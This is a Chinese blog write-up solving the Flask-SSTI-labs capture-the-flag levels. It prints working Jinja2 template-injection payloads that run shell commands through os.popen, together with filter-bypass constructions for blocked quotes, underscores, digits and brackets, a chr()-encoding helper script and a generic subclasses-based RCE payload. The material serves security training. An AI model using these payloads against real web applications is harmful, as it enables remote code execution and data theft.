CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记

已于 2024-03-15 18:12:40 修改
阅读量1.3k 收藏 21
点赞数 21
分类专栏: CTF考点刷题总结 文章标签: flask python 后端 网络安全 web安全 安全
于 2024-03-13 21:47:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39947980/article/details/136692512
版权

CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记

文章目录

前记

搭建环境

建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用

以下题目我用简洁的payload 绕过{{lipsum.__globals__['os'].popen('ls').read()}}

其中lipsum为 flask框架 内置函数 通用

以下内容熟记 (因为绕过本质无非是换种形式表达相同的含义)

获取键值或下标的方式

dict['__builtins__']
dict.__getitem__('__builtins__')
dict.pop('__builtins__')
dict.get('__builtins__')
dict.setdefault('__builtins__')
list[0]
list.__getitem__(0)
list.pop(0)

获取属性的方式

().__class__
()["__class__"]
()|attr("__class__")
().__getattribute__("__class__")

Level 1 no waf

{{lipsum.__globals__['os'].popen('cat /app/flag').read()}}

image-20240313103230658

Level 2 bl[‘{{’]

{%%}可以用来声明变量,当然也可以用于循环语句和条件语句。
{{}}用于将表达式打印到模板输出
{##}表示未包含在模板输出中的注释
\##可以有和{%%}相同的效果

{{}} 等价于 {%print%}

image-20240313103609026

Level 3 no waf and blind

盲注

第一 判断出不出网

{{lipsum.__globals__['os'].popen('ls').read()}}

image-20240313103912097

发现不出网

尝试写静态文件 请先了解 flask 静态目录概念

{{lipsum.__globals__['os'].popen('echo "test" >/app/static/1.txt').read()}}

image-20240313104107242

成功写入static静态目录

读取flag

{{lipsum.__globals__['os'].popen('echo `cat /app/flag` >/app/static/1.txt').read()}}

image-20240313104340387

Level 4 bl[‘[’, ‘]’]

{{lipsum.__globals__['os'].popen('ls').read()}}

获取键值或下标

dict['__builtins__']
dict.__getitem__('__builtins__')
dict.pop('__builtins__')
dict.get('__builtins__')
dict.setdefault('__builtins__')
list[0]
list.__getitem__(0)
list.pop(0)

替换一下

{{lipsum.__globals__.get('os').popen('ls').read()}}

image-20240313104659478

Level 5 bl[‘’', ‘"’]

过滤引号

{{lipsum.__globals__['os'].popen('ls').read()}}

完全可以替换为 request.args.参数名(get方式)

{{lipsum.__globals__[request.args.x1].popen(request.args.x2).read()}}

image-20240313104932040

Level 6 bl[‘_’]

{{lipsum.__globals__['os'].popen('ls').read()}}

可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)

{{lipsum['\x5f\x5fglobals\x5f\x5f']['os'].popen('cat /app/flag').read()}}

image-20240313105405632

Level 7 bl[‘.’]

{{lipsum.__globals__['os'].popen('ls').read()}}

用[] 代替 . 其他方法 参考 获取属性的四种方法

{{lipsum['__globals__']['os']['popen']('ls')['read']()}}

image-20240313105713573

Level 8 bl[“class”, “arg”, “form”, “value”, “data”, “request”, “init”, “global”, “open”, “mro”, “base”, “attr”]

过滤了很多关键词

{{lipsum.__globals__['os'].popen('ls').read()}}

编码绕过和拼接不能同时使用 试错报错

{{lipsum['__glob''als__']['os']['pop''en']('ls').read()}}

在这里插入图片描述

Level 9 bl[‘0-9’]

{{lipsum.__globals__['os'].popen('ls').read()}}

我们没用 数字

image-20240313111351943

Level 10 set config = None

image-20240313111515681

通过 current_app取config

{{url_for.__globals__['current_app'].config}}

在这里插入图片描述

Level 11 bl[‘’', ‘"’, ‘+’, ‘request’, ‘.’, ‘[’, ‘]’]

ban 了 ' " request'思考如何返回字符串?

通过过滤器 | join 返回变量

ban 了 . []如何取属性 ?

通过 |attr()

如何取键值 ?

通过 __getitem__('key')

然后用 {%set %}拼接

{{lipsum.__globals__['os'].popen('ls').read()}}

{{lipsum.__globals__['os'].popen('ls').read()}}
a.构造__globals__
{%set a=dict(__glo=a,bals__=a)|join%}

b.构造os
{%set b=dict(o=a,s=a)|join%}

c.构造popen
{%set c=dict(po=a,pen=a)|join%}

cmd.构造ls
{%set cmd=dict(l=a,s=a)|join%}

d.构造read
{%set d=dict(re=a.ad=a)|join%}

e.构造__getitem__
{%set e=dict(__ge=a,titem__=a)|join%} 

f.构造__builtins__
{%set f=dict(__buil=a,tins__=a)%}

g.构造 chr 字符
{%set ch=dict(ch=a,r=a)|join%}

{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}

就是

{%set a=dict(__glo=a,bals__=a)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set c=dict(po=a,pen=a)|join%}
{%set cmd=dict(l=a,s=a)|join%}
{%set d=dict(re=a,ad=a)|join%}
{%set e=dict(__ge=a,titem__=a)|join%} 
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}

image-20240313113208849

如果我们读flag 目录路径有 空格+ 斜杠 如何处理?

['__builtins__']['chr']函数 用ascii表 转换为字符

原payload:{{lipsum.__globals__['__builtins__']['chr']}}

附字符转chr脚本 记下 32 为空格 47为斜杠

i= input("输入字符串:")
flag=""
for c in i:
    c= ord(c)
    b="chr(%d)" %(c)
    flag +=b+'%2b'
print(flag[0:-3:1])

修改payload

构造细节

{{lipsum.__globals__['os'].popen('ls').read()}}
a.构造__globals__
{%set a=dict(__glo=a,bals__=a)|join%}

b.构造os
{%set b=dict(o=a,s=a)|join%}

c.构造popen
{%set c=dict(po=a,pen=a)|join%}

cmd.构造ls
{%set cmd=dict(l=a,s=a)|join%}

d.构造read
{%set d=dict(re=a,ad=a)|join%}

e.构造__getitem__
{%set e=dict(__ge=a,titem__=a)|join%} 

f.构造__builtins__
{%set f=dict(__buil=a,tins__=a)|join%}

ch.构造 chr 字符
{%set ch=dict(ch=a,r=a)|join%}

chh.构造 chr 函数
{%set chh=lipsum|attr(a)|attr(e)(f)|attr(e)(ch)%}

code={%set a=dict(__glo=a,bals__=a)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set c=dict(po=a,pen=a)|join%}
{%set d=dict(re=a,ad=a)|join%}
{%set e=dict(__ge=a,titem__=a)|join%} 
{%set f=dict(__buil=a,tins__=a)|join%}
{%set ch=dict(ch=a,r=a)|join%}
{%set chh=lipsum|attr(a)|attr(e)(f)|attr(e)(ch)%}
{%set cmd=(dict(ca=a,t=a)|join,chh(32),chh(47),dict(ap=a,p=a)|join,chh(47),dict(fl=a,ag=a)|join)|join%}
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}

image-20240313115508151

Level 12 bl[‘_’, ‘.’, ‘0-9’, ‘\’, ‘’', ‘"’, ‘[’, ‘]’]

相比上一题

过滤了下划线和数字

获取下划线(空格)的两种方式

  1. 通过截取 环境字符

  2. 通过 chr函数 转化

取下划线 测试

{{()|select|string|list}}

image-20240313210707762

返回字符 可以通过下标取到结果

{%set p=dict(po=a,p=a)|join%}
{{()|select|string|list|attr(p)(24)}}

但是这里禁止了数字0-9

可以通过过滤器 | length 或者| count取到

数字24

用python生成24个字符 python -c "print('a'*24)"

image-20240313211030139

aaaaaaaaaaaaaaaaaaaaaaaa

取下划线 _

{%set numa=dict(aaaaaaaaaaaaaaaaaaaaaaaa=b)|join|count%}
{%set p=dict(po=a,p=a)|join%}
{{()|select|string|list|attr(p)(numa)}}

在这里插入图片描述

延用上关的payload进行修改

{%set numa=dict(aaaaaaaaaaaaaaaaaaaaaaaa=b)|join|count%}
{%set p=dict(po=a,p=a)|join%}
{%set xhx=()|select|string|list|attr(p)(numa)%}
{%set a=(xhx,xhx,dict(glo=a,bals=a)|join,xhx,xhx)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set c=dict(po=a,pen=a)|join%}
{%set d=dict(re=a,ad=a)|join%}
{%set e=(xhx,xhx,dict(ge=a,titem=a)|join,xhx,xhx)|join%}
{%set f=(xhx,xhx,dict(buil=a,tins=a)|join,xhx,xhx)|join%}
{%set ch=dict(ch=a,r=a)|join%}
{%set chh=lipsum|attr(a)|attr(e)(f)|attr(e)(ch)%}
{%set numb=dict(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}
{%set numc=dict(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}
{%set cmd=(dict(ca=a,t=a)|join,chh(numb),chh(numc),dict(ap=a,p=a)|join,chh(numc),dict(fl=a,ag=a)|join)|join%}
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}

注意一下 不能单独

{%set a=dict(glob=a,als=a)|join%}
{%set ac=(xhx,xhx,a,xhx,xhx)|join%} //这是失败的

//还必须一起写(不然没法取完整下划线)

image-20240313213401782

Level 13 bl[‘_’, ‘.’, ‘\’, ‘’', ‘"’, ‘request’, ‘+’, ‘class’, ‘init’, ‘arg’, ‘config’, ‘app’, ‘self’, ‘[’, ‘]’]

沿用上关payload 嘿嘿

{%set numa=dict(aaaaaaaaaaaaaaaaaaaaaaaa=b)|join|count%}
{%set p=dict(po=a,p=a)|join%}
{%set xhx=()|select|string|list|attr(p)(numa)%}
{%set a=(xhx,xhx,dict(glo=a,bals=a)|join,xhx,xhx)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set c=dict(po=a,pen=a)|join%}
{%set d=dict(re=a,ad=a)|join%}
{%set e=(xhx,xhx,dict(ge=a,titem=a)|join,xhx,xhx)|join%}
{%set f=(xhx,xhx,dict(buil=a,tins=a)|join,xhx,xhx)|join%}
{%set ch=dict(ch=a,r=a)|join%}
{%set chh=lipsum|attr(a)|attr(e)(f)|attr(e)(ch)%}
{%set numb=dict(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}
{%set numc=dict(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=a)|join|count%}
{%set cmd=(dict(ca=a,t=a)|join,chh(numb),chh(numc),dict(ap=a,p=a)|join,chh(numc),dict(fl=a,ag=a)|join)|join%}
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}

image-20240313213530349

总结

我们想像一下假如出题人 比较细节 完全可以把flask内置函数lipsum,config,url_for都禁了

我们要这么办?

既然是ssti漏洞专门设计的CTF题 一定有解

恰好如果ssti ban了() 那么将没有办法做

我们完全可以从源字符取

例如

{{().__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat flag').read()}}

取chr函数可以通过

{{().__class__.__base__.__subclasses__()[133].__init__.__globals__['__builtins__']['chr']}}

相信自己,即使自己手动构造比较复杂,一步一步来,是可以完成的

J1rrY_
关注
  • 21
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flask-session-cookie-manager-master.zip
09-05
CTFsession伪造脚本,有解密和加密的,一定要有私钥才能进行。
CTF比赛中的常见-适合初学者
08-17
CTF比赛中的常见--适合初学者
CTF-web-ssti模板注入漏洞
最新发布
Ye的博客
04-14 725
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问。,那么页面上就会显示。
CTF Web方向考点总结
qq_41513009的博客
09-20 1万+
ctf web考点总结
Buuctf之web(五)
qq_50589021的博客
12-14 6471
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础目中非常常见,一般情况下只需要使
NJUPTCTF-2018出心得
郁离歌丶的博客
01-21 4393
NJUPTCTF-2018出心得 NJUPTCTF-2018结束也有几个月了,我也是昨天才忙完各种琐事,包括比赛、考试、出、总结等等。这段时间经历的事情太多,心也逐渐疲惫,同时感到和同龄人的差距越来越大。现在要补这几个月落下的东西,昨天把CTF学习交流群的入群出了一下,目比较简单,希望师傅们别喷。这段时间欠的最久的应该就是校赛的出心得了吧。虽然我的全部都有人解出,但是还是有很多人要我写...
SSTI(模板注入) 解析 和 ctf 做法
m0_56107268的博客
11-18 2539
ssti注入
CTF中Web各种目的解姿势
05-25
WebCTF中常考之一,它将实际渗透过程中的技术技巧转化为CTF,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类,是快速掌握出人思路的一种有效的方法。
CTF SSTI模板注入详解
weixin_47696216的博客
03-31 5577
“百度杯”CTF比赛 十一月场 Web:Fuzz python SSTI模板注入
Bugku CTF——WEB之SSTI学习笔
qq_51096893的博客
12-19 4144
目录 知识前提 一.目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF目类(我们今天讲解的是WEB类中注入问): 1.MISC(Miscellaneous)类,即安全杂项,目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3153
0x01 前言 最近在刷的过程中发现服务端模板注入的目也比较常见,这类注入目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能框架,通常用于编写大的网站。
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
CTF-All-In-One 2018.1.24
01-24
CTF-All-In-One 2018.1.24 CTF-All-In-One 2018.1.24 CTF-All-In-One 2018.1.24
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
2021暨南大学CTF新生杯(Web篇)
恒Keep毅
12-03 4597
目录【1星????】baby_sql【3星????】checkin相关链接弱语言判断科学技术法绕过字符串绕过【1星????】baby-upload【2星????】baby-unserialize绕过wake_up十六进制绕过【2星????】easy-sql构建tamper手动注入【2星????】easy_js处理十六进制的JS源码阅读JS源码控制台修改【2星????】easy-upload伪造后缀名字上传一句话以及菜刀拿到flag【4星????】easy-rce仅能函数执行?我该怎么绕过读取文件呢?【3星?
渗透技巧之403绕过_指纹识别
热门推荐
N的博客
03-14 7万+
渗透技巧之403绕过_指纹识别
CTFSSTI模板注入漏洞
ZhangAweio的博客
05-29 685
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类和请求的指令发送给对应Model业务模进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
ctf工具之binwalk--windows下(misc).rar
07-30
binwalk是一款用于分析和提取嵌入在二进制文件中的文件和数据的工具。对于CTF比赛来说,binwalk可以帮助我们进行文件的分析和提取,从而更好地理解目并解决问。 在Windows下使用binwalk,我们首先需要在官方网站(https://github.com/ReFirmLabs/binwalk)下载并安装binwalk的Windows版本。安装完成后,我们可以在命令行中使用binwalk命令进行操作。 拿到CTF目中的misc.rar文件后,我们可以使用binwalk来分析该文件。在命令行中,我们输入以下命令: binwalk misc.rar binwalk会对该文件进行分析,并将分析结果显示在命令行中。它会检测并提取出文件中的隐藏信息,并尝试识别文件中可能存在的其他类文件(如图像、压缩包等)。 除了显示分析结果外,binwalk还支持提取文件中的隐藏文件。我们可以使用以下命令来提取隐藏文件: binwalk -e misc.rar 这会将隐藏在misc.rar中的文件提取到当前目录中。我们可以通过查看提取出的文件来获得进一步的线索或解答。 总之,binwalk是一款强大的CTF工具,它可以帮助我们分析和提取嵌入在二进制文件中的文件和数据。在Windows下使用binwalk可以通过命令行进行操作,从而更好地解决CTF比赛中的问

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值